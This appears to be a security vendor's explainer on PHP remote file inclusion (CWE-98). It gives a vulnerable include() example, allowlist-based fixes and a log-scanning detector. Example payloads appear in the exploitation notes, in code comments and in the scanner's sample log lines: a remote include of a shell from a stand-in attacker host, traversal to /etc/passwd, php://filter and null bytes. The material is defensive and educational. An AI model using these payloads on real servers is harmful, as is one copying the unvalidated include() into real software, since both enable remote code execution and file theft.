CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')

Learn about CWE-98 (Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')), its security impact, exploitation methods, and prevention guidelines.

What is Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')?

• Overview: Improper Control of Filename for Include/Require Statement in PHP Program (CWE-98) occurs when a PHP application uses user input to determine the filename for include or require functions without proper validation, potentially allowing attackers to execute arbitrary code.

• Exploitation Methods:

  • Attackers supply a URL (for example, page=http://attacker.example/shell.txt) so that include() fetches and executes code hosted on a server they control. This remote form only works when allow_url_include is On, which is why that setting is the primary configuration control.
  • The same include() sink is reachable locally: path traversal (page=../../etc/passwd) and PHP stream wrappers such as php://filter let an attacker read source files or execute any content they can already get onto the server (uploaded files, log files, session files).

• Security Impact:

  • Direct consequences include remote code execution, allowing attackers to execute any command or script on the server.
  • Potential cascading effects include unauthorized data access, system compromise, and further network penetration.
  • Business impact may involve data breaches, service disruptions, reputational damage, and financial losses.

• Prevention Guidelines:

  • Specific code-level fixes: never pass user input to include/require as a path. Map the request value to a fixed set of page keys and look the key up in an allowlist, so the request value never becomes a file name.
  • Security best practices: keep includable files in a dedicated directory and confirm with realpath() that the resolved path stays inside it; treat basename() and character stripping as defense in depth, not as the primary control.
  • Configuration: set allow_url_include=Off in php.ini (Off by default since PHP 5.2, and deprecated as of PHP 7.4) so that include() refuses http://, ftp:// and data: targets even if validation is bypassed.
Corgea can automatically detect and fix Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') in your codebase. [Try Corgea free today](https://corgea.app).

Technical Details

Likelihood of Exploit: High

Affected Languages: PHP

Affected Technologies: Not specified

Vulnerable Code Example

<?php
// This code demonstrates a PHP Remote File Inclusion vulnerability.
// The script includes whatever path the request supplies, without validation.
// With allow_url_include=On, ?page=http://attacker.example/shell.txt makes
// include() fetch and execute attacker-hosted code; even with it Off,
// ?page=../../etc/passwd or a php://filter URI still reads local files.

if (isset($_GET['page'])) {
    include($_GET['page']); // Vulnerable: user input used directly as the include path
} else {
    include('default.php');
}

How to fix Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')?

To resolve this vulnerability, user input must never reach include() or require() as a path without passing a strict check. The following measures should be taken:

  1. Whitelist Validation: Accept only values from a predetermined list of page names, or better, map a page key such as "about" to a file name so the request value is never a path at all. This is the primary control; every other step is defense in depth.
  2. Sanitize Input: Strip directory components with basename() and reject values containing a scheme (http://, php://, data:), traversal sequences (../) or null bytes. Sanitization alone is not sufficient, because include() accepts many path forms and stream wrappers that a blocklist can miss.
  3. Use Static Paths: Build the path from a fixed base directory plus the allowlisted name, and confirm with realpath() that the result still lies inside that directory (a symlink can point outside it).
  4. Disable Remote File Inclusion: Set allow_url_include=Off in php.ini (it is PHP_INI_SYSTEM and cannot be changed with ini_set()) so that include() refuses http://, ftp:// and data: targets even if validation is bypassed.

Fixed Code Example

<?php
// This is the fixed version of the above code, mitigating the Remote File Inclusion vulnerability.

$allowed_pages = ['about.php', 'contact.php', 'home.php']; // Allowlist of includable files

// ?page[]=x would make $_GET['page'] an array, which basename() rejects; require a string.
if (isset($_GET['page']) && is_string($_GET['page'])) {
    $page = basename($_GET['page']); // Strip directory components (defense in depth only)
    if (in_array($page, $allowed_pages, true)) { // Strict comparison against the allowlist
        include($page); // Only a name from the allowlist can reach include()
    } else {
        include('404.php'); // Safe error page when the value is not allowlisted
    }
} else {
    include('default.php');
}
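A stricter version of the fix above, added here as an example rather than code from the original page: the request value is used only as a key into a fixed map, the chosen file is canonicalised with realpath() and checked to lie inside a dedicated templates directory, and rejected keys are logged with the client address. The directory name `templates`, the page keys, the file names and the `404.php` error page are assumptions for illustration.

```php
<?php
// Added example (not from the original page). The request parameter is a key
// into a fixed map, never a path; the resolved file must lie inside TEMPLATE_DIR.
// The directory name, page keys and file names are assumptions for illustration.

declare(strict_types=1);

const TEMPLATE_DIR = __DIR__ . '/templates';   // assumed directory holding includable files

// Only these keys are accepted; the file names never come from the request.
const PAGE_MAP = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/**
 * Resolve a page key to an absolute path, or return null when the key is
 * unknown, the file is missing, or its canonical path escapes TEMPLATE_DIR
 * (for example through a symlink planted in the templates directory).
 */
function resolve_page(string $key): ?string
{
    if (!array_key_exists($key, PAGE_MAP)) {
        return null;                                // unknown key: filesystem untouched
    }

    $base = realpath(TEMPLATE_DIR);
    $path = realpath(TEMPLATE_DIR . '/' . PAGE_MAP[$key]);
    if ($base === false || $path === false) {
        return null;                                // directory or file does not exist
    }

    // Containment check on canonical paths: $path must start with "$base/".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// ?page[]=x would make $_GET['page'] an array; treat anything but a string as invalid.
$raw  = $_GET['page'] ?? 'home';
$path = resolve_page(is_string($raw) ? $raw : '');

if ($path === null) {
    // Log the rejected value (json_encode keeps control characters visible) and the client address.
    error_log(sprintf('include rejected: page=%s from %s',
        json_encode($raw), $_SERVER['REMOTE_ADDR'] ?? 'unknown'));
    http_response_code(404);
    include TEMPLATE_DIR . '/404.php';             // assumed static error page
} else {
    include $path;
}
```

The map means a request can only ever select one of three known files, so basename() and character stripping are no longer needed; the realpath() containment check remains as a guard against the templates directory itself being tampered with.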

Additional Best Practices

  • Configuration Hardening: Set allow_url_include=Off in php.ini; it is PHP_INI_SYSTEM, so it cannot be changed at runtime with ini_set(). allow_url_fopen governs URL access for functions such as file_get_contents() and fopen(); disabling it as well closes another remote-fetch path, but it also breaks legitimate outbound HTTP from those functions, so decide that per application.
  • Logging and Monitoring: Log every rejected page value together with the client address, and alert on request parameters that contain URL schemes (http://, ftp://), PHP stream wrappers (php://, data:, expect://), traversal sequences (../) or null bytes.
  • Regular Security Audits: Conduct regular security audits to identify and fix vulnerabilities early.
  • Keep Software Updated: Regularly update PHP and any libraries your application depends on to the latest secure versions.
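One way to act on the logging and monitoring recommendation above, added as an example that is not part of the original page: a small PHP scanner that pulls the `page` parameter out of access-log lines in the common log format and labels values that look like inclusion attempts (remote URLs, PHP stream wrappers, traversal, null bytes, absolute paths). The log lines are constructed samples, and the pattern list covers common payloads rather than every possible one.

```php
<?php
// Added example (not from the original page): classify the `page` query
// parameter in access-log lines and flag values that look like inclusion attacks.
// The log lines below are constructed samples; the patterns cover common payloads only.

declare(strict_types=1);

/**
 * Return a short label for a suspicious include target, or null if it looks benign.
 * $value is expected to be already URL-decoded (parse_str() decodes it below).
 */
function classify_include_target(string $value): ?string
{
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $value) || stripos($value, 'data:') === 0) {
        // http://, https://, ftp://, php://, phar://, expect://, data: ...
        $scheme = strtolower(strstr($value, ':', true) ?: '');
        return in_array($scheme, ['http', 'https', 'ftp', 'ftps'], true)
            ? 'remote-url'
            : 'stream-wrapper:' . $scheme;
    }
    if (strpos($value, "\0") !== false) {
        return 'null-byte';                         // classic extension-truncation trick
    }
    if (preg_match('#(^|[\\\\/])\.\.([\\\\/]|$)#', $value)) {
        return 'path-traversal';
    }
    if ($value !== '' && $value[0] === '/') {
        return 'absolute-path';
    }
    return null;
}

/**
 * Scan common-log-format lines and return [client IP, page value, label]
 * for every request whose page parameter was flagged.
 */
function scan_access_log(array $lines): array
{
    $hits = [];
    foreach ($lines as $line) {
        // 203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=... HTTP/1.1" 200 512
        if (!preg_match('#^(\S+) \S+ \S+ \[[^\]]+\] "\w+ ([^" ]+) [^"]*"#', $line, $m)) {
            continue;
        }
        $qpos = strpos($m[2], '?');
        if ($qpos === false) {
            continue;                               // no query string
        }
        parse_str(substr($m[2], $qpos + 1), $params);   // parse_str URL-decodes values
        if (!isset($params['page']) || !is_string($params['page'])) {
            continue;
        }
        $label = classify_include_target($params['page']);
        if ($label !== null) {
            $hits[] = [$m[1], $params['page'], $label];
        }
    }
    return $hits;
}

// Constructed sample log lines for illustration (RFC 5737 documentation addresses).
$sample = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=about.php HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?page=http://198.51.100.9/shell.txt HTTP/1.1" 200 512',
    '203.0.113.8 - - [10/Oct/2023:13:55:41 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 512',
    '203.0.113.9 - - [10/Oct/2023:13:55:42 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 512',
    '203.0.113.9 - - [10/Oct/2023:13:55:43 +0000] "GET /index.php?page=..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1" 200 512',
];

foreach (scan_access_log($sample) as [$ip, $value, $label]) {
    printf("%-12s %-22s %s\n", $ip, $label, $value);
}
```

Run from the command line with `php scan.php`; the benign `about.php` request produces no output, while the other four lines are labelled remote-url, stream-wrapper:php, path-traversal and null-byte respectively. In production the same classifier can run inside the application on the rejected branch of the include check, where the value is already decoded.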


Find this vulnerability and fix it with Corgea

Scan your codebase for CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') and get remediation guidance

Start for free and no credit card needed.